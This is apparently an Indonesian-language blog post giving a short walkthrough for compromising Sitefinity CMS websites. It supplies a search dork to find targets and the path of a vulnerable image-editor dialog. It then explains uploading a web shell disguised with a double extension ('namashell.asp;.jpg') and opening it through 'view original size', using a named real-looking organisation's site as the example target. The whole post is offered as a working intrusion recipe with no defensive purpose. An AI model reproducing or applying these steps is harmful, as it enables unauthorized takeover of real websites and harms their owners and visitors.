Dork : "Sitefinity: Login"
Exploit : UserControls/Dialogs/ImageEditorDialog.aspx
pertama agan cari dlu target webnya dengan dork nya.,,
jika target sudah ketemu,masukan exploitnya..
contoh target http://www.hoac-bsa.org/sitefinity/
tambahkan exploitnya sehingga menjadi seperti ini
http://www.hoac-bsa.org/sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx
jika sudah kya tampilan di atas maka sekarang tinggak kita upload shellnya,..contoh : (namashell.asp;.jpg) atau (namashell.asp;.gif)
jika sudah terupload,maka cara untuk menampilkan shell punya kita dengan mengklik "view original size"..
maka hasilnya seperti ini http://www.hoac-bsa.org/Images/agarirs.asp;.jpg
Tidak ada komentar:
Posting Komentar